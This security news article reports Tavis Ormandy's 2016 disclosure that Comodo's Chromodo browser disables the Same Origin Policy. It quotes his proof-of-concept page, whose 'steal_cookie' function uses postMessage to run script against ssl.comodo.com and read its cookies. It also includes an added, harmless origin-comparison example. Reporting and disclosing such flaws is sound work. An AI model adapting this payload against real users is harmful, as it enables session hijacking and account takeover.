Chromodo is a free browser offered by the antivirus firm Comodo. It is a customized version of Google’s Chrome browser, based on the Chromium open-source code and developed to improve users’ security and privacy. Unfortunately, that promise does not hold: the Chromodo browser is in fact affected by a serious security issue.
Tavis Ormandy, a security expert from Google, analyzed the Chromodo browser and discovered a serious flaw that puts users’ security at risk. The flaw is related to the Same Origin Policy, a fundamental part of the web application security model that protects users’ browsing experience.
“The policy permits scripts running on pages originating from the same site – a combination of scheme, hostname, and port number – to access each other’s DOM with no specific restrictions, but prevents access to DOM on different sites,” reads Wikipedia.
Without the Same Origin Policy, code that runs on one website is allowed to execute on another website, with serious repercussions for security.
If you are using Chromodo, be aware that the browser has the Same Origin Policy disabled.
“When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Chromodo is described as “highest levels of speed, security and privacy”, but actually disables all web security.” Ormandy wrote in a security advisory.
“Let me repeat that, they ***disable the same origin policy***…. ?!?.. To reproduce, do something like this:
<html>
<head></head>
<body>
<script>
function steal_cookie(obj) {
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code: "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>
With the Same Origin Policy disabled, an attacker can use a malicious script to perform a number of activities, including taking over social media accounts and acting on behalf of the victim.
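The origin comparison described in the Wikipedia quote above, as an added example (it is not code from Ormandy's advisory or from Comodo): it builds the (scheme, hostname, port) tuple for each URL and reports which constructed page pairs a policy-enforcing browser would let access each other's DOM. `attacker.example` and the other sample URLs are constructed placeholders; only `https://ssl.comodo.com/` comes from the page.

```javascript
// Added illustration of the same-origin comparison: (scheme, hostname, port).
// Default ports for the two schemes this sketch handles.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Returns the origin tuple for a URL, or null when the origin is opaque
// (data:, javascript:, file: ...), which never matches any other origin.
function originTuple(rawUrl) {
  const u = new URL(rawUrl); // the parser lower-cases scheme and hostname
  if (u.origin === "null" || !(u.protocol in DEFAULT_PORTS)) return null;
  return {
    scheme: u.protocol.slice(0, -1),
    host: u.hostname,
    port: u.port || DEFAULT_PORTS[u.protocol], // URL drops default ports
  };
}

// True only when all three tuple members match exactly.
function sameOrigin(a, b) {
  const x = originTuple(a);
  const y = originTuple(b);
  if (x === null || y === null) return false;
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Constructed sample: [page running the script, page whose DOM it wants].
const CASES = [
  ["https://attacker.example/poc.html", "https://ssl.comodo.com/"],
  ["https://ssl.comodo.com/a", "HTTPS://SSL.Comodo.com:443/b"],
  ["http://ssl.comodo.com/", "https://ssl.comodo.com/"],
  ["https://comodo.com/", "https://ssl.comodo.com/"],
  ["https://ssl.comodo.com:8443/", "https://ssl.comodo.com/"],
  ["data:text/html,<p>x</p>", "https://ssl.comodo.com/"],
];

function evaluate(cases) {
  return cases.map(([from, to]) => ({ from, to, allowed: sameOrigin(from, to) }));
}

for (const r of evaluate(CASES)) {
  console.log(`${r.allowed ? "ALLOW" : "DENY "} ${r.from} -> ${r.to}`);
}
```

Only the second pair is allowed: a differing scheme, hostname (including a parent domain) or port is enough to make two pages different origins.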
Selling antivirus doesn’t qualify you to fork chromium, you’re going to screw it up. https://t.co/Dd0sqhRxwi #antivirus #wtf
— Tavis Ormandy (@taviso) 2 February 2016
Ormandy reported the issue on Jan. 21, and on Tuesday he revealed that Comodo tried to patch the issue in the Chromodo browser, in particular against an exploit he developed, but the fix doesn’t work.
Let’s wait for a definitive fix from the company.
(Security Affairs – Chromodo, Same Origin Policy)